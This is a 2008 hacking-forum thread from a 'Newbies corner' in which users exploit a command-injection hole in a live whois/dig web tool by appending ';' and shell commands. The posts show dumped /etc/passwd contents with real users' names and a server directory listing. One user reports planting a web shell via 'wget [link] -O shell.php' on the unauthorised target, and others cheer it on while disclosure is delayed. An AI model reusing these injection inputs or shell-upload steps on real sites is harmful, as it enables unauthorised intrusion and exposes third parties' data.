|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 49
Members: 0
Total: 49
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Hmm question |
|
Posted: Sat Jun 07, 2008 3:05 am |
|
|
Chedda |
Active user |
|
|
Joined: May 26, 2008 |
Posts: 27 |
|
|
|
|
|
|
|
So I was browsing around looking for a good place for a wannabe hacker. I came across this, but wasn't given any information on how its performed. I have been looking elsewhere to find more information on this exploit and I think I would something, but not even sure if its correct. "whois.net is running a shell command, you can end one and start another. You'd do that by adding a semicolon to the Dig arguments."
So I tried such commands as website.com;ls -a and it actually works, but not like the below. Can anyone fill in the gaps?
Quote: |
You Are Searching For ***censored due to it being a spoiler*** /etc/passwd:
; <<>> DiG 9.2.3 <<>>
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 34366
;; flags: qr rd ra; QUERY: 1, ANSWER: 13, AUTHORITY: 0, ADDITIONAL: 14
;; QUESTION SECTION:
;. IN NS
;; ANSWER SECTION:
. 154054 IN NS G.ROOT-SERVERS.NET.
. 154054 IN NS K.ROOT-SERVERS.NET.
. 154054 IN NS A.ROOT-SERVERS.NET.
. 154054 IN NS I.ROOT-SERVERS.NET.
. 154054 IN NS L.ROOT-SERVERS.NET.
. 154054 IN NS D.ROOT-SERVERS.NET.
. 154054 IN NS C.ROOT-SERVERS.NET.
. 154054 IN NS M.ROOT-SERVERS.NET.
. 154054 IN NS F.ROOT-SERVERS.NET.
. 154054 IN NS H.ROOT-SERVERS.NET.
. 154054 IN NS E.ROOT-SERVERS.NET.
. 154054 IN NS J.ROOT-SERVERS.NET.
. 154054 IN NS B.ROOT-SERVERS.NET.
;; ADDITIONAL SECTION:
K.ROOT-SERVERS.NET. 509993 IN A 193.0.14.129
K.ROOT-SERVERS.NET. 509993 IN AAAA 2001:7fd::1
L.ROOT-SERVERS.NET. 603676 IN A 199.7.83.42
M.ROOT-SERVERS.NET. 603676 IN A 202.12.27.33
M.ROOT-SERVERS.NET. 603676 IN AAAA 2001:dc3::35
A.ROOT-SERVERS.NET. 603676 IN A 198.41.0.4
A.ROOT-SERVERS.NET. 603676 IN AAAA 2001:503:ba3e::2:30
B.ROOT-SERVERS.NET. 602195 IN A 192.228.79.201
C.ROOT-SERVERS.NET. 602195 IN A 192.33.4.12
D.ROOT-SERVERS.NET. 509993 IN A 128.8.10.90
E.ROOT-SERVERS.NET. 603676 IN A 192.203.230.10
F.ROOT-SERVERS.NET. 514317 IN A 192.5.5.241
F.ROOT-SERVERS.NET. 514317 IN AAAA 2001:500:2f::f
G.ROOT-SERVERS.NET. 514317 IN A 192.112.36.4
;; Query time: 1 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Tue May 20 23:05:41 2008
;; MSG SIZE rcvd: 500
# $FreeBSD: src/etc/master.passwd,v 1.25.2.6 2002/06/30 17:57:17 des Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5:System &:/:/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin
news:*:8:8:News Subsystem:/:/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin
ftp:*:21:21:Anonymous FTP User:/ftp:/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/sbin/nologin
cyrus:*:60:60:the cyrus mail server:/nonexistent:/sbin/nologin
pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin
webadmin:*:79:79:Web Admin:/usr/local/apache:/bin/csh
www:*:80:80:World Wide Web Owner:/nonexistent:/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
clamav:*:106:106:Clam Antivirus:/nonexistent:/sbin/nologin
websitetools:*:1001:1001:Administrative User:/home/websitetools:/bin/tcsh
spamd:*:58:58:SpamAssassin user:/var/spool/spamd:/sbin/nologin
dgudema:*:1002:1002:Daniel Gudema:/home/dgudema:/bin/tcsh
bibana:*:1003:1003:Bryant Ibana:/home/bibana:/usr/local/bin/bash
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
|
|
|
Last edited by Chedda on Sun Jun 08, 2008 12:39 am; edited 1 time in total |
|
|
|
|
|
|
|
Posted: Sat Jun 07, 2008 7:16 am |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
Interesting, good find. You could now use wget and upload shell.
How did you find this vulnerability?
and btw, No links to vulnerable sites. |
|
|
|
|
|
|
|
|
Posted: Sat Jun 07, 2008 4:41 pm |
|
|
Chedda |
Active user |
|
|
Joined: May 26, 2008 |
Posts: 27 |
|
|
|
|
|
|
|
I was merely googling random thing about hacking in general and came across it on a forum. I didn't really find anything someone else did all the work. The forum is dead though and the post a couple of months old. They never said what they did to accomplish this, so I was wondering if you knew what command they used?
only returns
Quote: | You Are Searching For ****.com;ls -a:
; <<>> DiG 9.2.3 <<>> ****.com
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 60077
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 0
;; QUESTION SECTION:
;****.com. IN A
;; ANSWER SECTION:
****.com. 43200 IN A 65.162.***.***
;; AUTHORITY SECTION:
****.com. 43200 IN NS ns2.address.com.
****.com. 43200 IN NS ns1.address.com.
;; Query time: 104 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sat Jun 7 16:39:40 2008
;; MSG SIZE rcvd: 85
.
..
.htaccess
Application.php
Browsersize.URL
admin
back.jpg
circuit.dtd
circuit.xml
dspHelloWorld.php
dspTesting.php
dsp_about.php
fusebox.dtd
fusebox.init.php
fusebox.xml
fusebox4.loader.php4.php
fusebox4.parser.php4.php
fusebox4.runtime.php4.php
fusebox4.transformer.php4.php
includes
index.php
index_old.html
ipaddress
layFooter.php
layHeader.php
layouts
left.jpg
lib
manual
parsed
ping
plugins
protolize
right.jpg
seo
tools
udf_canonicalpath.php
udf_relativefilepath.php
validator
websites
websitetools.css
whois
whois.net |
|
|
|
|
|
|
|
|
|
Posted: Sat Jun 07, 2008 6:08 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
|
|
|
|
Posted: Sun Jun 08, 2008 12:15 am |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
I successfully uploaded a shell. Too easy.
When you've had your fun I'll email them about the vulnerability. All it takes is one malicious hacker to destroy that site, and seriously who would want to be malicious against a site like that. |
|
|
|
|
Posted: Sun Jun 08, 2008 12:33 am |
|
|
Chedda |
Active user |
|
|
Joined: May 26, 2008 |
Posts: 27 |
|
|
|
|
|
|
|
gibbocool wrote: | I successfully uploaded a shell. Too easy.
When you've had your fun I'll email them about the vulnerability. All it takes is one malicious hacker to destroy that site, and seriously who would want to be malicious against a site like that. |
Hehe glad to see someone got some use out of it. As far I am concerned you can email them I will never figure out how to use it sadly. |
|
|
|
|
Posted: Sun Jun 08, 2008 4:50 am |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
Quite simple, it's just a matter of knowing unix commands. If you don't know them, i advise you to install linux such as Ubuntu and have a play.
All I did here was
1. find a directory with write permissions
2. use wget [link to shell.txt] -O [directoryname/shell.php]
3. go to url of shell.php
I'll wait a couple days then email them. |
|
|
|
|
Posted: Sun Jun 08, 2008 5:00 am |
|
|
Chedda |
Active user |
|
|
Joined: May 26, 2008 |
Posts: 27 |
|
|
|
|
|
|
|
gibbocool wrote: | Quite simple, it's just a matter of knowing unix commands. If you don't know them, i advise you to install linux such as Ubuntu and have a play.
All I did here was
1. find a directory with write permissions
2. use wget [link to shell.txt] -O [directoryname/shell.php]
3. go to url of shell.php
I'll wait a couple days then email them. |
Why can't even be as cool as you Gibbocool. You make everything so simple, love it! |
|
|
|
|
Posted: Wed Jun 11, 2008 5:40 pm |
|
|
Kazuma |
Beginner |
|
|
Joined: May 17, 2008 |
Posts: 3 |
Location: Zwollywood |
|
|
|
|
|
|
No succes for me on multiple websites. It just returns a list of my local machine |
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|